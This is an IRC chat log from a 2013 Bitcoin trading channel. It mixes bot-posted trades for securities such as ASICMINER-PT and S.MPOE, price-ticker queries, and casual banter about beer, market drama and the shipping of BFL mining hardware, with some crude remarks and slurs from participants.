[BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [+] Apr 20 15:47:44 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] Apr 20 15:57:35 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] Apr 20 16:08:51 asic mioner is back :) Apr 20 16:12:20 [BTCTC] [ASICMINER-PT] 3 @ 1.25 = 3.75 BTC [+] Apr 20 16:24:13 is this chan dead cuz no drama? Apr 20 16:24:23 or uis everyone just on silk roads supply? Apr 20 16:38:14 copumpkin please tell me why its so dead in here.... where is the drama? Apr 20 16:46:47 good point Apr 20 16:46:50 ;) Apr 20 16:46:59 ? Apr 20 16:47:05 no turbulence in the market Apr 20 16:47:17 no scandels i guess either Apr 20 16:47:26 even that Apr 20 16:48:17 Now that btc is dead and everyone is wrapping things up..we should all get together for a farewell party..maybe in Vegas. Apr 20 16:48:23 It would be fun =D Apr 20 16:51:28 haha :) Apr 20 16:51:35 im okay with that Apr 20 16:51:47 last 5 of 7 blocks by btc guild Apr 20 16:53:37 i think most of us here are clearly of the winning side of the whole story ;) Apr 20 16:54:26 dont know anyone from here who did not make good profit Apr 20 16:55:09 as soon as pirate pays im one rich mother fucker Apr 20 16:57:23 hope that some media hipe continues to bring more money in Apr 20 16:57:32 otherwise we will play against us sooner or later... Apr 20 16:58:13 community Apr 20 16:58:20 excluding newcomers Apr 20 16:58:29 that are only attracted by mainstream Apr 20 16:58:57 including most people hanging around here in irc Apr 20 17:00:00 "most" Apr 20 17:08:22 oh good long time volume low... it gets really boring Apr 20 17:11:01 yeah iv started drinking... Apr 20 17:11:25 iv never seen you here before b0n1 Apr 20 17:28:36 [MPEX] [S.MPOE] 5000 @ 0.00071465 = 3.5733 BTC [+] Apr 20 17:28:37 [MPEX] [S.MPOE] 10000 @ 0.00071466 = 7.1466 BTC [+] Apr 20 17:28:39 [MPEX] [S.MPOE] 750 @ 0.00071499 = 0.5362 BTC [+] Apr 20 17:33:48 !ticker m s.dice Apr 20 17:33:49 [MPEX:S.DICE] 1D: 0.00297466 / 0.00297469 / 0.00297475 (3900 shares, 11.60 BTC), 7D: 0.0012 / 0.0029812 / 0.00439999 (71342 shares, 212.69 BTC), 30D: 0.0012 / 0.00327373 / 0.00499997 (1630648 shares, 5,338.31 BTC) Apr 20 17:35:11 ;;bids 0 Apr 20 17:35:14 There are currently 53947344 bitcoins demanded at or over 0.0 USD, worth 21157665.7495 USD in total. | Data vintage: 0.0282 seconds Apr 20 17:35:46 21 million w00t Apr 20 17:36:24 yeh that is pretty w00t..represents a lot of hard work mining Apr 20 17:36:43 ? Apr 20 17:36:50 that is fiat Apr 20 17:36:55 they want to buy btc Apr 20 17:36:57 not miners Apr 20 17:37:11 ;;asks 99999999 Apr 20 17:37:11 There are currently 122322.43 bitcoins offered at or under 99999999.0 USD, worth 1306486311.74 USD in total. | Data vintage: 116.8431 seconds Apr 20 17:37:15 that is miners Apr 20 17:37:24 chaang-noi: good for you! drinking is a great hobby. Apr 20 17:37:30 You should get a sweet flask. Apr 20 17:37:48 iv not found one that will hold enough beer :/ Apr 20 17:38:21 if you see a good one, about 50 oz or so let me know Apr 20 17:38:22 hehe Apr 20 17:38:34 Are you in the US? Apr 20 17:38:42 thailand Apr 20 17:38:48 im goat Apr 20 17:39:16 not sure what beers are there Apr 20 17:39:29 singha chang leo Apr 20 17:39:46 Im in the U.S. On the light side i like Bud Light, Miller Light (Domestic) or Import I really, REALLY like Heineken Apr 20 17:40:11 Got an aftertaste of really good hydroponic marijuana to me idk why Apr 20 17:40:22 lol Apr 20 17:40:29 Havent tried that..Im not a fan of the others really..stout..I like Beers Apr 20 17:41:08 ;;next Apr 20 17:41:08 expecting a rise toward 126-127 and drop back down toward 115-118, 110 | resistance: 123, 127 | support: 115, 110, 100, 90 | lower buy targets: 96-100, 86 | updated by OneFixt at Apr 20 2013, 7:36 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 7 hours, 5 minutes, and 7 seconds ago Apr 20 17:41:30 Tried a Guinness once and it was aweful but I think that one single serving ale got me drunk. Apr 20 17:41:41 Hmm. Its morning here in the U.S. I should go have a beer or two..nice buzz. Apr 20 17:42:14 lol Apr 20 17:43:22 Heineken doesn't even deserve to be called beer Apr 20 17:45:46 I'm in belgium ! screw you all :) Apr 20 17:46:53 i can ship some awsome beer Apr 20 17:48:07 like most things, locally brewed substances are the best Apr 20 17:49:08 error4733, can you grab me a case of Westvleteren? Apr 20 17:51:41 punkman, nice try but no :/ Apr 20 17:52:55 [BTCTC] [ASICMINER-PT] 1 @ 1.17001 BTC [-] Apr 20 17:53:04 [BTCTC] [ASICMINER-PT] 2 @ 1.17 = 2.34 BTC [-] Apr 20 17:53:06 [BTCTC] [ASICMINER-PT] 8 @ 1.166 = 9.328 BTC [-] Apr 20 17:53:09 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Apr 20 17:53:15 [BTCTC] [ASICMINER-PT] 1 @ 1.14 BTC [-] Apr 20 17:53:20 [BTCTC] [ASICMINER-PT] 1 @ 1.13 BTC [-] Apr 20 17:53:57 I'm gonna have to visit sooner or later Apr 20 17:55:32 error4733: I remember a site that sold belgian beer for bitcoins, was that you? Apr 20 17:56:09 punkman1 do you try it ? Apr 20 17:57:02 [HAVELOCK] [HIM] 3 @ 1.74 = 5.22 BTC [-] Apr 20 17:57:13 try what? Apr 20 17:58:01 [HAVELOCK] [SDICE] 3 @ 0.255 = 0.765 BTC [-] Apr 20 17:59:02 [HAVELOCK] [VTX] 5 @ 0.361001 = 1.805 BTC [-] Apr 20 18:00:57 Westvleteren Apr 20 18:01:02 [HAVELOCK] [HIM] 1 @ 1.73 BTC [-] Apr 20 18:02:02 [HAVELOCK] [SDICE] 1 @ 0.25000003 BTC [-] Apr 20 18:02:43 Japan try to ban TOR : http://mainichi.jp/english/english/newsselect/news/20130418p2a00m0na013000c.html Apr 20 18:02:53 only had Westvleteren12, want to try the other two Apr 20 18:03:35 can't go wrong with some nice steak and a strong beer Apr 20 18:13:02 [BTCTC] [ASICMINER-PT] 1 @ 1.11 BTC [-] Apr 20 18:13:54 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [+] Apr 20 18:24:13 [MPEX] [S.MPOE] 2300 @ 0.00069865 = 1.6069 BTC [-] Apr 20 18:26:39 germen beers > rest Apr 20 18:26:43 german Apr 20 18:29:41 /j #bitcoin-pricetalk Apr 20 18:46:19 [BTCTC] [COGNITIVE] 1 @ 0.1975 BTC [+] Apr 20 18:48:55 [MPEX] [S.MPOE] 3729 @ 0.00069865 = 2.6053 BTC [-] Apr 20 18:48:57 [MPEX] [S.MPOE] 7990 @ 0.00069338 = 5.5401 BTC [-] Apr 20 19:00:20 [BTCTC] [BITVPS] 1 @ 0.00235 BTC [+] Apr 20 19:00:55 [BTCTC] [BITVPS] 4 @ 0.00235 = 0.0094 BTC [+] Apr 20 19:02:20 [BTCTC] [BITVPS] 5 @ 0.00235 = 0.0118 BTC [+] Apr 20 19:04:27 [BTCTC] [PAJKA.BOND] 1 @ 0.0982 BTC [-] Apr 20 19:04:31 [BTCTC] [PAJKA.BOND] 1 @ 0.0981 BTC [-] Apr 20 19:04:35 [BTCTC] [PAJKA.BOND] 10 @ 0.098 = 0.98 BTC [-] Apr 20 19:04:44 [BTCTC] [PAJKA.BOND] 19 @ 0.097 = 1.843 BTC [-] Apr 20 19:11:06 sup Apr 20 19:16:05 dead. Apr 20 19:16:10 O_o Apr 20 19:19:59 blegh Apr 20 19:20:12 rally Apr 20 19:20:14 ;;ticker Apr 20 19:20:15 BTCUSD ticker | Best bid: 123.98849, Best ask: 123.99999, Bid-ask spread: 0.01150, Last trade: 123.99999, 24 hour volume: 61689.93491308, 24 hour low: 115.00000, 24 hour high: 123.88000, 24 hour vwap: 119.59518 Apr 20 19:20:34 hey trf Apr 20 19:20:37 truffles: Apr 20 19:20:39 how you doing? Apr 20 19:21:41 dizzy? Apr 20 19:22:13 i'm good. Apr 20 19:22:24 lol Apr 20 19:22:38 probably shouldn't be on IRC while driving... Apr 20 19:22:43 ;) Apr 20 19:24:42 driving a manual? Apr 20 19:24:45 automatic? Apr 20 19:24:58 nice! you will not regret it. Apr 20 19:25:26 it's hard to start, just try to relax and listen to the sound of the engine. you'll eventually know when to shift automatically. you won't even think about it. Apr 20 19:26:03 yes, but it will be fun. Apr 20 19:26:19 and if I'm ever bleeding on the side of the road, you'd be able to take me to the hospital in my truck Apr 20 19:28:37 hahaha, i guess you're right. I'm on my own. Apr 20 19:36:39 people gave up upon weekend dip Apr 20 19:36:44 rally starting Apr 20 19:36:46 hehe Apr 20 19:37:56 oh wait Apr 20 19:37:59 sunday is tomorrow Apr 20 19:38:09 a well pehaps still stands. Apr 20 19:38:38 we'll see. curious rally, i don't think it will get anywhere. Apr 20 19:38:52 although that's some serious bids Apr 20 19:42:43 [BTCTC] [ASICMINER-PT] 1 @ 1.14 BTC [-] Apr 20 19:42:53 [BTCTC] [ASICMINER-PT] 8 @ 1.15 = 9.2 BTC [+] Apr 20 19:44:02 [HAVELOCK] [HIM] 1 @ 1.75 BTC [+] Apr 20 19:45:45 it will go back down - at some point... Apr 20 19:50:29 you mean down to 200 Apr 20 19:52:12 ;;bids 101 Apr 20 19:52:12 There are currently 24685.523 bitcoins demanded at or over 101.0 USD, worth 2762325.61183 USD in total. | Data vintage: 67.7837 seconds Apr 20 19:52:21 ;;asks 149 Apr 20 19:52:21 There are currently 32190.145 bitcoins offered at or under 149.0 USD, worth 4391426.99655 USD in total. | Data vintage: 76.5542 seconds Apr 20 19:52:54 There are currently 0 bitcoins demanded at or over 170.0 USD, worth 0.0 USD in total. | Data vintage: 108.8589 seconds Apr 20 19:56:01 There are currently 46650.911 bitcoins offered at or under 160.0 USD, worth 6583993.34858 USD in total. | Data vintage: 0.0035 seconds Apr 20 19:56:09 Can't wait for a news drama ! Simon (BTC-24) in jail, MtGox lagging again Apr 20 19:56:27 hm in jail? Apr 20 19:56:29 i must have missed that Apr 20 19:56:42 a well Apr 20 19:56:44 of i go Apr 20 19:56:45 later Apr 20 19:56:47 [BTCTC] [GSDPT] 5 @ 0.00387 = 0.0194 BTC [+] Apr 20 19:56:50 off Apr 20 19:57:19 do i have to set up an api connection so i can trade when gox is not responding? i cant see that the api would respond either for that matter..cant get an order in so wtf do I do when things get hot Apr 20 19:57:29 [MPEX] [S.MPOE] 16300 @ 0.00069338 = 11.3021 BTC [-] Apr 20 19:59:24 No he's not in jail Apr 20 19:59:29 but could be fun Apr 20 19:59:48 (trading speaking) Apr 20 20:00:32 [BTCTC] [ASICMINER-PT] 1 @ 1.169 BTC [+] Apr 20 20:03:40 [MPEX] [S.DICE] 3 @ 0.00297471 = 0.0089 BTC [+] Apr 20 20:07:00 [BTCTC] [ASICMINER-PT] 1 @ 1.169 BTC [+] Apr 20 20:34:57 ;;seen evoorhees Apr 20 20:34:58 evoorhees was last seen in #bitcoin-assets 1 week, 1 day, 11 hours, 7 minutes, and 55 seconds ago: I'm not poor, or suffering, and I'm definitely not a patriot Apr 20 20:38:59 [BTCTC] [ASICMINER-PT] 1 @ 1.126 BTC [-] Apr 20 20:40:24 [BTCTC] [ASICMINER-PT] 1 @ 1.1259 BTC [-] Apr 20 20:51:02 [HAVELOCK] [VTX] 1 @ 0.405 BTC [+] Apr 20 21:04:43 ;;ticker Apr 20 21:04:43 BTCUSD ticker | Best bid: 123.67850, Best ask: 123.79999, Bid-ask spread: 0.12149, Last trade: 123.67850, 24 hour volume: 53806.93501200, 24 hour low: 115.00000, 24 hour high: 124.33200, 24 hour vwap: 119.93257 Apr 20 21:04:51 ;;bids 90 Apr 20 21:04:53 There are currently 58576.32 bitcoins demanded at or over 90.0 USD, worth 5977056.0251 USD in total. | Data vintage: 0.0066 seconds Apr 20 21:05:17 ;;asks 150 Apr 20 21:05:17 There are currently 39206.959 bitcoins offered at or under 150.0 USD, worth 5452284.80515 USD in total. | Data vintage: 23.4266 seconds Apr 20 21:15:15 [BTCTC] [ASICMINER-PT] 1 @ 1.159 BTC [+] Apr 20 21:16:01 [HAVELOCK] [VTX] 1 @ 0.405 BTC [+] Apr 20 21:16:02 [HAVELOCK] [VTX] 5 @ 0.405 = 2.025 BTC [+] Apr 20 21:16:18 hey if there is anyone that runs the bitbet.us website online... did you guys implement the affiliate tracking and rewards from scratch or were you able to find something to reuse for this? thanks Apr 20 21:22:24 mircea is all business on other side of the table Apr 20 21:22:38 send the drones :D Apr 20 21:25:05 omg lol @ encyclopedia bitcoinica Apr 20 21:25:21 now this is what the internet was needed for.. Apr 20 21:26:17 ref. the page on there for mpoe-pr Apr 20 21:26:48 Mircea Popescu has really nice tits though. Apr 20 21:32:51 sure : https://si0.twimg.com/profile_background_images/9854979/tweetar.jpg Apr 20 21:38:13 Lol i'm serious. She's real, and it's not mircea with tits. Apr 20 21:38:47 that must have been before his boob job..he must have laid out some cash for those girls..they are n-i-c-e Apr 20 21:39:25 [MPEX] [S.MPOE] 8810 @ 0.00069338 = 6.1087 BTC [-] Apr 20 21:39:26 [MPEX] [S.MPOE] 9650 @ 0.00068776 = 6.6369 BTC [-] Apr 20 21:39:28 [MPEX] [S.MPOE] 3500 @ 0.00068294 = 2.3903 BTC [-] Apr 20 21:39:42 that might not be a purse, and it might be "european" to carry one..but to a country boy in the U.S., its f'n gay Apr 20 21:40:34 who goes around with their chest all out anyway...thats gay too. Apr 20 21:42:18 MOAR! Apr 20 21:42:22 you seem to know a lot about what is gay.... Apr 20 21:43:47 is it gay if there is an uzzi in there? Apr 20 21:44:30 *uzi Apr 20 21:48:54 so when you do shopping in brazil, you bought nothing bc carrying a bag is gay Apr 20 21:48:56 Uzi??? Apr 20 21:50:02 it's gay if uzi is pink Apr 20 21:53:08 jurov: heh, mpoe-pr is real? pics or it didn't happen Apr 20 21:58:36 http://i46.tinypic.com/2pplnoh.jpg Apr 20 21:59:35 [MPEX] [S.MPOE] 3250 @ 0.00070971 = 2.3066 BTC [+] Apr 20 22:00:01 [HAVELOCK] [VTX] 2 @ 0.4 = 0.8 BTC [-] Apr 20 22:15:30 It's already on trilema Apr 20 22:17:13 [MPEX] [S.MPOE] 15750 @ 0.00071388 = 11.2436 BTC [+] Apr 20 22:17:19 but that's yest, i was not there yet. I'm told there will be other photo today. Apr 20 22:17:59 cu later Apr 20 22:23:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18001 BTC [-] Apr 20 22:23:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1731 BTC [-] Apr 20 22:23:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15992 BTC [-] Apr 20 22:23:57 [BTCTC] [CRYPTO-TRADE] 2 @ 0.15 = 0.3 BTC [-] Apr 20 22:28:22 this is hilarious Apr 20 22:28:22 https://www.youtube.com/watch?v=A3PbMlbUtUo Apr 20 22:32:01 [MPEX] [S.MPOE] 41 @ 0.00068294 = 0.028 BTC [-] Apr 20 22:32:03 [MPEX] [S.MPOE] 20609 @ 0.00068225 = 14.0605 BTC [-] Apr 20 23:01:10 [MPEX] [S.MPOE] 4391 @ 0.00068225 = 2.9958 BTC [-] Apr 20 23:01:12 [MPEX] [S.MPOE] 11350 @ 0.00068201 = 7.7408 BTC [-] Apr 20 23:01:13 [MPEX] [S.MPOE] 12959 @ 0.00068159 = 8.8327 BTC [-] Apr 20 23:06:59 [BTCTC] [ASICMINER-PT] 1 @ 1.169 BTC [+] Apr 20 23:09:04 [BTCTC] [ASICMINER-PT] 1 @ 1.118 BTC [-] Apr 20 23:11:39 [BTCTC] [COGNITIVE] 2 @ 0.1989 = 0.3978 BTC [+] Apr 20 23:16:49 [MPEX] [S.MPOE] 11300 @ 0.00068424 = 7.7319 BTC [+] Apr 20 23:16:51 [MPEX] [S.MPOE] 16500 @ 0.00068561 = 11.3126 BTC [+] Apr 20 23:19:02 [HAVELOCK] [VTX] 22 @ 0.409999 = 9.02 BTC [+] Apr 20 23:24:01 [HAVELOCK] [VTX] 1 @ 0.41 BTC [+] Apr 20 23:24:02 [HAVELOCK] [VTX] 1 @ 0.415 BTC [+] Apr 20 23:24:02 [HAVELOCK] [VTX] 5 @ 0.41990099 = 2.0995 BTC [+] Apr 20 23:50:17 [BTCTC] [ASICMINER-PT] 1 @ 1.112001 BTC [-] Apr 20 23:50:25 [BTCTC] [ASICMINER-PT] 1 @ 1.112 BTC [-] Apr 20 23:50:29 [BTCTC] [ASICMINER-PT] 1 @ 1.112 BTC [-] Apr 20 23:50:32 [BTCTC] [ASICMINER-PT] 2 @ 1.100001 = 2.2 BTC [-] Apr 20 23:50:38 interesting Apr 21 00:11:01 [HAVELOCK] [HIM] 2 @ 1.75 = 3.5 BTC [+] Apr 21 00:22:01 [HAVELOCK] [VTX] 2 @ 0.41990909 = 0.8398 BTC [+] Apr 21 00:26:00 [HAVELOCK] [SDICE] 1 @ 0.25000004 BTC [+] Apr 21 00:26:01 [HAVELOCK] [SDICE] 7 @ 0.25000003 = 1.75 BTC [-] Apr 21 00:27:47 [BTCTC] [LTC-MINING] 1 @ 0.2502 BTC [-] Apr 21 00:28:51 [BTCTC] [ASICMINER-PT] 1 @ 1.1649 BTC [+] Apr 21 00:49:01 [HAVELOCK] [HIM] 1 @ 1.75 BTC [+] Apr 21 00:56:11 ;;ticker Apr 21 00:56:11 BTCUSD ticker | Best bid: 129.03000, Best ask: 129.10000, Bid-ask spread: 0.07000, Last trade: 129.03000, 24 hour volume: 70337.07523935, 24 hour low: 115.00000, 24 hour high: 132.00000, 24 hour vwap: 123.05068 Apr 21 01:11:16 ;;next Apr 21 01:11:17 expecting a test of 120 | resistance: 127-128 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 20 2013, 21:51 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 20 minutes and 16 seconds ago Apr 21 01:28:02 [HAVELOCK] [VTX] 2 @ 0.41990909 = 0.8398 BTC [+] Apr 21 01:43:17 [BTCTC] [ASICMINER-PT] 1 @ 1.1649 BTC [+] Apr 21 01:43:40 [BTCTC] [ASICMINER-PT] 1 @ 1.165 BTC [+] Apr 21 01:44:10 [BTCTC] [ASICMINER-PT] 13 @ 1.17 = 15.21 BTC [+] Apr 21 02:35:43 [MPEX] [S.MPOE] 14150 @ 0.00070502 = 9.976 BTC [+] Apr 21 02:44:53 Hmm. Apr 21 02:48:37 I'm searching for an arbitridge fund Apr 21 02:49:28 ;;ticker Apr 21 02:49:28 BTCUSD ticker | Best bid: 127.50000, Best ask: 127.89999, Bid-ask spread: 0.39999, Last trade: 127.90000, 24 hour volume: 74164.32533376, 24 hour low: 115.00000, 24 hour high: 132.00000, 24 hour vwap: 123.98498 Apr 21 02:49:44 ;;bids 126 Apr 21 02:49:46 There are currently 353.63209 bitcoins demanded at or over 126.0 USD, worth 44633.6111698 USD in total. | Data vintage: 0.0058 seconds Apr 21 02:49:52 ;;offers 128 Apr 21 02:49:53 Error: "offers" is not a valid command. Apr 21 02:50:52 ;asks 128 Apr 21 02:54:42 ;;ticker Apr 21 02:54:43 BTCUSD ticker | Best bid: 126.99000, Best ask: 127.00000, Bid-ask spread: 0.01000, Last trade: 126.99000, 24 hour volume: 74259.82458626, 24 hour low: 115.00000, 24 hour high: 132.00000, 24 hour vwap: 124.00372 Apr 21 02:54:45 thanks Apr 21 03:02:44 [BTCTC] [S.DICE-PT] 35 @ 0.0033 = 0.1155 BTC [+] Apr 21 03:03:24 [BTCTC] [S.DICE-PT] 96 @ 0.00325 = 0.312 BTC [-] Apr 21 03:03:27 [BTCTC] [S.DICE-PT] 1 @ 0.00325 BTC [-] Apr 21 03:03:43 [BTCTC] [S.DICE-PT] 21 @ 0.00324 = 0.068 BTC [-] Apr 21 03:03:46 [BTCTC] [S.DICE-PT] 87 @ 0.00323 = 0.281 BTC [-] Apr 21 03:03:48 [BTCTC] [S.DICE-PT] 2540 @ 0.00322 = 8.1788 BTC [-] Apr 21 03:04:02 [HAVELOCK] [SDICE] 17 @ 0.28749999 = 4.8875 BTC [+] Apr 21 03:04:05 [BTCTC] [S.DICE-PT] 1 @ 0.00317 BTC [-] Apr 21 03:11:32 [BTCTC] [RSM] 1 @ 0.0056 BTC [+] Apr 21 03:14:23 sup Apr 21 03:17:09 hey Apr 21 03:17:25 so, whats new Apr 21 03:20:18 [BTCTC] [ASICMINER-PT] 1 @ 1.19 BTC [+] Apr 21 03:20:47 ;;seen smickles Apr 21 03:20:48 smickles was last seen in #bitcoin-assets 2 weeks, 2 days, 8 hours, 38 minutes, and 15 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 21 03:22:01 [HAVELOCK] [SDICE] 2 @ 0.2875 = 0.575 BTC [+] Apr 21 03:23:01 [HAVELOCK] [SDICE] 1 @ 0.29 BTC [+] Apr 21 03:23:02 [HAVELOCK] [SDICE] 2 @ 0.29 = 0.58 BTC [+] Apr 21 03:23:04 [MPEX] [S.MPOE] 3083 @ 0.00070502 = 2.1736 BTC [+] Apr 21 03:23:15 ;;bids 0 Apr 21 03:23:17 There are currently 61643024 bitcoins demanded at or over 0.0 USD, worth 20167456.6952 USD in total. | Data vintage: 0.0123 seconds Apr 21 03:25:01 [HAVELOCK] [SDICE] 2 @ 0.31 = 0.62 BTC [+] Apr 21 03:25:26 [BTCTC] [S.DICE-PT] 1 @ 0.00301 BTC [-] Apr 21 03:25:57 [BTCTC] [S.DICE-PT] 1 @ 0.003 BTC [-] Apr 21 03:26:50 kakobrekla tell me about russia Apr 21 03:26:50 jkjk Apr 21 03:27:14 i cant do that Apr 21 03:27:17 i can tell you about somalia tho Apr 21 03:29:00 [HAVELOCK] [VTX] 1 @ 0.42 BTC [+] Apr 21 03:29:43 oh wow BFL is about to ship... Apr 21 03:29:47 http://codinginmysleep.com/bfl-jalapeno-unboxing-and-demo/ Apr 21 03:29:49 the fuck? Apr 21 03:32:04 yes, idiots. Apr 21 03:33:00 [HAVELOCK] [VTX] 2 @ 0.429 = 0.858 BTC [+] Apr 21 03:33:02 [HAVELOCK] [VTX] 5 @ 0.43498998 = 2.1749 BTC [+] Apr 21 03:33:03 [HAVELOCK] [VTX] 3 @ 0.43498999 = 1.305 BTC [+] Apr 21 03:33:04 [HAVELOCK] [VTX] 30 @ 0.43499 = 13.0497 BTC [+] Apr 21 03:33:05 [HAVELOCK] [VTX] 12 @ 0.435 = 5.22 BTC [+] Apr 21 03:33:06 [HAVELOCK] [VTX] 9 @ 0.443 = 3.987 BTC [+] Apr 21 03:33:08 [HAVELOCK] [VTX] 3 @ 0.444333 = 1.333 BTC [+] Apr 21 03:33:09 [HAVELOCK] [VTX] 45 @ 0.444333 = 19.995 BTC [+] Apr 21 03:33:10 [HAVELOCK] [VTX] 6 @ 0.4443333 = 2.666 BTC [+] Apr 21 03:33:10 [HAVELOCK] [VTX] 50 @ 0.4444 = 22.22 BTC [+] Apr 21 03:33:11 [HAVELOCK] [VTX] 35 @ 0.4445555 = 15.5594 BTC [+] Apr 21 03:35:00 [HAVELOCK] [VTX] 3 @ 0.4445555 = 1.3337 BTC [+] Apr 21 03:35:02 [HAVELOCK] [VTX] 13 @ 0.44469999 = 5.7811 BTC [+] Apr 21 03:35:03 [HAVELOCK] [VTX] 3 @ 0.4447 = 1.3341 BTC [+] Apr 21 03:35:03 [HAVELOCK] [VTX] 20 @ 0.44899999 = 8.98 BTC [+] Apr 21 03:35:04 [HAVELOCK] [VTX] 10 @ 0.449 = 4.49 BTC [+] Apr 21 03:35:05 [HAVELOCK] [VTX] 11 @ 0.45 = 4.95 BTC [+] Apr 21 03:35:26 om nom nom Apr 21 03:36:00 [HAVELOCK] [VTX] 4 @ 0.45 = 1.8 BTC [+] Apr 21 03:36:42 this coding in my sleep guy Apr 21 03:36:46 retarded Apr 21 03:38:09 [MPEX] [S.MPOE] 6067 @ 0.00070502 = 4.2774 BTC [+] Apr 21 03:38:11 [MPEX] [S.MPOE] 9666 @ 0.00070732 = 6.837 BTC [+] Apr 21 03:39:28 kakobrekla: i hate how sterotypical he looks Apr 21 03:43:33 lol Apr 21 03:49:20 [BTCTC] [S.DICE-PT] 1 @ 0.00394 BTC [+] Apr 21 03:49:34 im not even talking about his looks Apr 21 03:49:38 dont care much for that Apr 21 03:49:56 but i opened 3 articles and they were all below any level Apr 21 03:53:50 are you just mad that he won't fix your computer? Apr 21 03:56:24 im sorry? Apr 21 03:56:39 the silly t-shirt, bad joke Apr 21 03:56:46 so is this the first bfl in the wild then? Apr 21 03:58:01 [BTCTC] [S.DICE-PT] 1 @ 0.00394 BTC [+] Apr 21 04:02:51 ;;bc,stats Apr 21 04:02:56 Current Blocks: 232331 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1524 blocks | Next Difficulty In About: 1 week, 2 days, 16 hours, 58 minutes, and 5 seconds | Next Difficulty Estimate: 9204567.98654 | Estimated Percent Change: 2.56591 Apr 21 04:05:14 [BTCTC] [BASIC-MINING] 1 @ 0.449 BTC [+] Apr 21 04:05:24 [BTCTC] [BASIC-MINING] 6 @ 0.449 = 2.694 BTC [+] Apr 21 04:06:52 [BTCTC] [ASICMINER-PT] 1 @ 1.19999 BTC [+] Apr 21 04:39:45 ;;ticker Apr 21 04:39:46 BTCUSD ticker | Best bid: 126.52000, Best ask: 126.60000, Bid-ask spread: 0.08000, Last trade: 126.52000, 24 hour volume: 71380.30563688, 24 hour low: 115.20000, 24 hour high: 132.00000, 24 hour vwap: 125.13336 Apr 21 04:41:35 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 21 04:56:08 heh. so a database link fluked. Apr 21 04:56:28 in between [20-Apr-2013 23:25:23 and [20-Apr-2013 23:25:39 i have 119k lines of errorlog. Apr 21 04:56:29 hm? Apr 21 04:56:38 10k calls a second. Apr 21 04:56:53 lol Apr 21 04:56:59 sick Apr 21 04:57:45 crazy Apr 21 04:57:46 yeah Apr 21 05:06:30 [MPEX] [S.MPOE] 11776 @ 0.00070073 = 8.2518 BTC [-] Apr 21 05:07:42 ;;later tell dom__ kakobrekla wrote it from scratch Apr 21 05:07:43 The operation succeeded. Apr 21 05:07:55 this is because he can't read code so he has to write it instead. just like bitcoindev. Apr 21 05:13:21 [MPEX] [S.MPOE] 4325 @ 0.00070732 = 3.0592 BTC [+] Apr 21 05:13:23 [MPEX] [S.MPOE] 5000 @ 0.00071283 = 3.5642 BTC [+] Apr 21 05:13:26 [MPEX] [S.MPOE] 3000 @ 0.00071348 = 2.1404 BTC [+] Apr 21 05:13:28 [MPEX] [S.MPOE] 1775 @ 0.0007139 = 1.2672 BTC [+] Apr 21 05:14:21 [BTCTC] [ASICMINER-PT] 6 @ 1.19999 = 7.1999 BTC [-] Apr 21 05:14:25 thats how a lot of folks learn to code heh Apr 21 05:14:34 hehe. Apr 21 05:16:19 If you want some free bitcoins are are good at coming up names for a website, please PM me. Apr 21 05:21:24 imTorim shoot. **** BEGIN LOGGING AT Sun Apr 21 19:17:41 2013 Apr 21 19:18:27 ahh so what's new ? Apr 21 19:19:02 [HAVELOCK] [HIM] 1 @ 1.8299 BTC [+] Apr 21 19:22:02 [HAVELOCK] [HIM] 1 @ 1.83 BTC [+] Apr 21 19:22:44 i wanted to show you the value of a market/exchange, that's all Apr 21 19:22:52 Look at HIM react to BFL news. Apr 21 19:23:55 [MPEX] [S.MPOE] 11308 @ 0.00071389 = 8.0727 BTC [-] Apr 21 19:29:26 ;;goxlag Apr 21 19:29:26 Error: Problem retrieving gox lag. Try again later. Apr 21 19:29:41 ;;bids 0 Apr 21 19:29:41 Error: Failure to retrieve order book data. Try again later. Apr 21 19:31:11 worx Apr 21 19:32:32 goxed again Apr 21 19:33:08 free fall http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 21 19:33:44 oh what Apr 21 19:33:45 WTF Apr 21 19:33:46 ;;ticker Apr 21 19:33:47 BTCUSD ticker | Best bid: 124.89000, Best ask: 125.00000, Bid-ask spread: 0.11000, Last trade: 125.00000, 24 hour volume: 102398.14793661, 24 hour low: 117.86000, 24 hour high: 132.00000, 24 hour vwap: 125.27373 Apr 21 19:33:55 error4733: is it about to free fall? Apr 21 19:34:15 dummo Apr 21 19:34:17 dunno Apr 21 19:34:21 oh shit it is on other exchanges Apr 21 19:34:22 FUCK Apr 21 19:34:23 SELL NOW Apr 21 19:34:29 i look chart, smell bad Apr 21 19:34:36 one week without drama is maybe too much asking pffff Apr 21 19:34:42 XD Apr 21 19:34:48 time to make some money :) Apr 21 19:34:55 sold yesteday ;) Apr 21 19:35:33 hopefully a billionaire doesn't come in and start buying up tons of coins Apr 21 19:35:39 buuuut Apr 21 19:36:44 [BTCTC] [BTC-BOND] 1 @ 0.009913 BTC [+] Apr 21 19:36:53 [BTCTC] [BTC-BOND] 2 @ 0.009912 = 0.0198 BTC [-] Apr 21 19:37:03 ;;next Apr 21 19:37:04 [BTCTC] [BTC-BOND] 1 @ 0.00991 BTC [-] Apr 21 19:37:04 expecting a test of 120 | resistance: 132, 136, 138-140 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 20 2013, 22:33 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 18 hours, 4 minutes, and 2 seconds ago Apr 21 19:37:05 [BTCTC] [BASIC-MINING] 5 @ 0.41551 = 2.0776 BTC [-] Apr 21 